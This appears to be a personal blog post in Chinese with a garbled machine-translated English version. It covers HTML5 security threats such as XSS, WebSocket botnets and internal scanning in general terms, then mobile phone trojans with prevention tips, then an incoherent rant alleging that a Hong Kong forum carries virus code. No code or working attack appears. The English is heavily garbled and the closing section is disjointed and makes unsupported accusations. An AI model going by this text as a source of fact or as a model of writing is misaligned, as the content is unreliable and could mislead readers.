Not only have the previous version of HTML5 content HTML4 specifications, 
Yet it adds many new features, 
Contains the contents of surface graphics, audio and video; 
Storage Storage feature surface, 
Web Socket Communications surface and - 
- System multitasking Web Worker, 
Operating surface drag (Drag and Drop) and - 
- Voice input function (as shown above), 
Can be said that there is an epoch-making improvements, 
A master in one, 
Construction of the system in terms of planning and implementation staff - 
- Is a new trend can not be ignored, 
But new technology always brings new threats 
This sentence is more appropriate for the HTML5! 

Generally speaking, we can HTML5 security threats into three categories - 
1 original security issues appear in HTML5: 
As the most common cross-site scripting attacks (XSS) and - 
- Injection attacks (SQL Injection) 
Will still continue to appear in the HTML5 era. 

2 new problems arising due to the new features of HTML5: 
HTML5 provides a new functionality to implement complete the threat practices. 
For example, LocalStorage stored XSS exploits - 
- With shell code, HTML5-based - 
- Botnets (Botnet) 
- Through Web socket API function - 
- Reach C & C (Command & Control) - 
- As well as data transmission, etc.; 
Use HTML5 to reach the internal network scanning, 
In general, the hackers to enter into the internal network - 
- In addition to outside attacks through the mail, 
Probably need to spend a lot of effort, 
And through HTML5 can through - 
- Users browse the web on the internal network to launch a scan. 
In addition, HTML5 can be in the user authorization - 
- Get GPS location information, 
More likely to be exposed to user privacy at risk. 

3 new problems arising as a result of the new platform: 
Because while many of the new HTML5 platform 
New browser (browser) content specifications, 
So many platforms and browsers original - 
- They need to update their version and functionality. 
The launch of the new platform have more opportunities to produce weakness, 
HTML5 in particular, to deal with this feature-rich, 
Content content specification high variability, 
In the new platform can be expected - 
- The new browser will have a new generation of security problems.     *








*HTML5的網站、原始碼安全未臻成熟--[??]
值得注意的是,
目前針對網站安全、
原始碼安全的方案--
--鮮少針對HTML5的新功能有相對應的--
--測試與驗證項目,
若您的網站已經採用HTML5的內容格式,
或者您經常使用的網站已經升級到HTML5,
很有可能在安全功能的測試上還沒有充分的保證,
這也將是在資安工具應用上可能的發展方向之一。
這樣的威脅手法可以被運用--
--於遠端攻擊web伺服器、
資訊蒐集、
建立遠端的控制命令模式(remote shell)、
造成機敏資訊的暴露、
網頁式的殭屍網路(botnet)、
DDoS攻擊網站的新方法等。

*HTML5 website, source security not matured -{?? @}
It is noteworthy that, 
Currently for site security, 
Source security solutions - 
- Rarely for the new features of HTML5 have a corresponding - 
- Testing and validation projects 
If your site has content using HTML5 format, 
Or you frequently use the site has been upgraded to HTML5, 
Is likely to test the safety features on yet fully guaranteed, 
This will also be one of the possible applications of information  
security tools development. 
Such techniques can be utilized threat - 
- On a remote web server attacks, 
Information gathering, 
Create a remote control command mode (remote shell), 
Resulting exposure alert information, 
Web-based zombie network (botnet), 
A new method of DDoS attacks and other sites. *
-------------------------------------------------

**病毒--->也玩手機--->中毒變“肉雞”!!
在智能手機更新換代的今天,
手機病毒也已經悄然進入到了人們的信息生活!!
** Virus ---> also play phone ---> poisoning becomes "chicken"!! 
In today's smartphone replacement, 
Mobile phone virus has quietly entered the information into people's lives. !!  













*你可別小看了手機病毒,
它會悄悄潛伏,偷偷轉移你的話費,
還可能竊取你的個人隱私,
如果一不留神,
你日常使用的手機還有可能變成“肉雞”。

病毒有硬也有軟--
近日,李女士外出旅遊,
可當5天后她回到家時卻大吃一驚:
她的手機話費竟然欠費多達400元。
李女士到營業廳查詢自己的話費清單發現:
自己的手機與某個不認識的號碼每分鐘--->
--->有近20條短信來往!可是,
手機上並沒有顯示收發的短信。
經過向專業人士諮詢,
李女士才得知手機是因為中了木馬病毒,
導致手機自動收發短信,
因此產生高額話費。

1月20日,記者就此問題諮詢--
--了虹橋電信天翼大世界手機售後服務中心張經理。
他告訴記者,手機病毒有硬病毒也有軟病毒。
一般來說,硬病毒是指一些手機出廠時就有的,
其原理就是通過手機內部的軟件“消費”、盜取信息。
而軟病毒即惡意病毒軟件,
就像電腦病毒一樣,
是一種會損害用戶利益的軟件,
有些會讓你的手機自動大量發送彩信從而產生高額話費。
像“手機骷髏”就是目前比較常見的軟病毒,
中毒後,手機會自動給通訊錄裡的號碼發送短信。

還有一種手機病毒則更可怕,
它們會把用戶的信息,
包括短信、通話記錄,甚至手機位置,
都上傳給不法分子,
或者上傳到特定的網站,
如果用戶在短信中涉及到銀行賬號等個人隱私,
那後果就會很嚴重。
張先生稱:"“總之,你的手機一旦中毒就有可能成為'肉雞'。
如果手機病毒​​大規模爆發,
整個​​手機上網速度也會慢下來。”

智能手機易中毒--
那究竟什麼樣的手機容易中毒呢?
三星售後服務公司的李先生說:
'“手機病毒通常感染的都是智能手機。'
因為,手機病毒和電腦病毒一樣需要通過系統傳播,
因為智能手機上網較多,
更易被感染病毒。
但這和智能手機安裝的系統無關,
任何系統都有被感染的可能。”'

“通過手機外觀是無法判斷手機中沒中毒的,
對於個人來說,
主要的還是經常查詢通話、短信流量,
看是否有異常。”張經理說。

相關鏈接--
#-->三招有效預防手機變“肉雞”--
1).用戶手機在收到不明來歷的短信、
彩信、圖片、網址鏈接,
千萬不要輕易打開。
2).不要將手機,
特別是智能機隨便藉給別人使用,
防止被裝惡意軟件。
如遇手機維修,
最好把SIM卡拔出來。
另外,藍牙等功能,不用時最好關掉。

3).可以給智能手機安裝防病毒軟件,
並定期進行升級。
但需要提醒大家的是,
防病毒軟件相對於最新病毒來說,
會有滯後期,
所以不能完全依賴它防止所有病毒的入侵,
還是要經常查看手機流量等使用情況是否有異常。

*You can not underestimate the mobile phone virus, 
It will quietly lurking secretly transfer your calls, 
May also steal your personal privacy, 
If an inattentive, 
Daily use of the phone you may also become a "chicken." 

There are also hard-virus software - 
Recently, Lee travel, 
But when she got home after 5 days Shique surprise: 
Her phone bill actually owe as much as $ 400. 
Ms. Lee to the operating room to check their list of calls that: 
Own a mobile phone and do not know the number per minute ---> 
---> There are nearly 20 text messages between! However, 
Do not show the phone to send and receive text messages. 
After a consultation to professionals, 
Lee learned that the phone is because the Trojan virus, 
Cause the phone to automatically send and receive text messages, 
Resulting high charges. 

January 20, this reporter Advisory - 
- Hongqiao World Telecom Tianyi Zhang phone service center. 
He told reporters that mobile phone viruses are also hard-virus software virus. 
In general, hard-virus refers to the number of mobile phone factory there, 
The principle is through the phone's internal software "consumption", to steal information. 
The soft-virus software that is malicious viruses, 
Like computer viruses, 
Is a software that will damage the interests of users, 
Some will make your phone automatically send MMS to generate a large number of high charges. 
Like "phone Skull" is now more common soft virus, 
After the poisoning, the phone will automatically be sent to the address book in the number of text messages. 

There is also a mobile phone virus is even more terrible, 
They turn the user's information, 
Including text messages, call logs, and even cell phone location 
Are uploaded to the criminals, 
Or upload to a specific website, 
If a user comes to bank accounts and other personal privacy in the message, 
Then the consequences will be very serious. 
Zhang said: "" In short, once your phone is likely to become poisoned 'broilers'. 
If the phone is a major outbreak of the virus, 
Entire mobile Internet speed will slow down. " 

Smartphone Easy poisoning - 
What kind of phone that easily poisoned it? 
Lee said Samsung's service: 
'"Mobile phone virus infections are usually smart phone.' 
Because mobile phone viruses and computer viruses spread through the system, 
Because the smart mobile Internet more, 
More susceptible to infection. 
But smart phones and installed system-independent, 
Any system may have been infected. "' 

"With the appearance of the phone is unable to determine the phone did not poisoning 
For individuals, 
The main thing is often a query calls, SMS traffic, 
See if there are abnormalities. "Zhang said. 

Related links - 
# -> Three strategies to effectively prevent the phone becomes "chicken" - 
1) The user receives phone messages from unknown sources, 
MMS, pictures, URL links, 
Do not be easily opened. 
2) Do not phone, 
In particular, the use of intelligent machines just to lend, 
Prevent malicious software being installed. 
In case of mobile phone repair, 
Best to pull out the SIM card. 
In addition, Bluetooth and other functions, is not the best time to switch off. 

3) can be to install anti-virus software, smart phones, 
And regularly upgraded. 
But the need to remind everyone that, 
Anti-virus software with respect to the latest viruses, the 
Will lag, 
So you can not completely rely on it to prevent any virus invasion, 
Or should always check whether the use of mobile phones flow abnormalities. 

-------------------------------------------------- ---------------------------   

*"一個小型網站"的電腦病毒求解版塊[於香港地區]---
>實例描述----->詳見連結點----->
該論壇太差了,哪個版主跟電腦''中毒者''説
只是廣告病毒---??!!我們為之側目(感覺好笑!)
不懂便是不懂...呵呵~而且他哪兒的人們=
=只會''靠着面子要緊第一喔!!=上天的神來報應了!!
各位專家們請按一下連結點吧 =
  http://computer.uwants.com/forumdisplay.php?fid=1091      

--是否看見很多有顏色的求解毒者的帖子..!
可惜是哪兒的人囂張自大@,[不可救也!佛祖家也閉目休息了~]
各位有否感覺到"它的''html在緩慢地移動??
已經被植入''非常病毒碼"喔!
專家定必知道是什么=不能說的秘密喔!~哈哈..*     
*"A small site" computer virus solving forum [in Hong Kong] --- 
> Instance description -----> See links point -----> 
The forum is bad, what with the computer'' moderators'' said poisoning 
Just ad virus ---??!! Our look askance (feel funny!) 
Do not know do not know ... Oh ~ And that is where his people = 
='' Will bear against the face of the first Oh!! = God's retribution of God!! 
Experts you click the link point of it = 
  http://computer.uwants.com/forumdisplay.php?fid=1091   

--Are there a lot of color to see who's seeking detoxification posts ..! 
Unfortunately, where the person is arrogant arrogant @,   
[can not save it! Buddha family also turn a blind eye to rest ...] 
Whether you have felt "it'' html slowly moving in?? 
'' Very virus has been implanted, "Oh! 
Experts will certainly know what = Secret Oh! ~ Haha .....*

*續--"上編28日的衛道''黑客者''精神--看看貪婪及邪惡的''比特幣''--
--在哪個'支付宝'和'淘宝'將它成為一種交易貨幣後的结果!!!   
誰才是''黑客者''來擾亂市場上規模經濟的定案!?--
再來述[以往曾解柝過的]説HTML5的新一代-->被病毒不知不覺中侵入,-  
-然後且看小型網站被病毒入侵現實狀...詳見內文....   
"-USA(en)-Continued - compiled on the 28th Wei Road'' by'' hacker spirit - look greedy and evil'' in which'' bitcoins 'Paypal' and 'Taobao' Will it be the result of a transaction currency after!! ! who is'' hacker'' to disrupt the market by the economies of scale come finalized state--
-- [solution Watchman had previously had] said HTML5--
-- is the next generation -!?> invaded by the virus unknowingly,   
- then Let us look at the reality of small sites are viruses like ...
.. see inside text .... "!!*===THE   END===Melody.Blog~===>/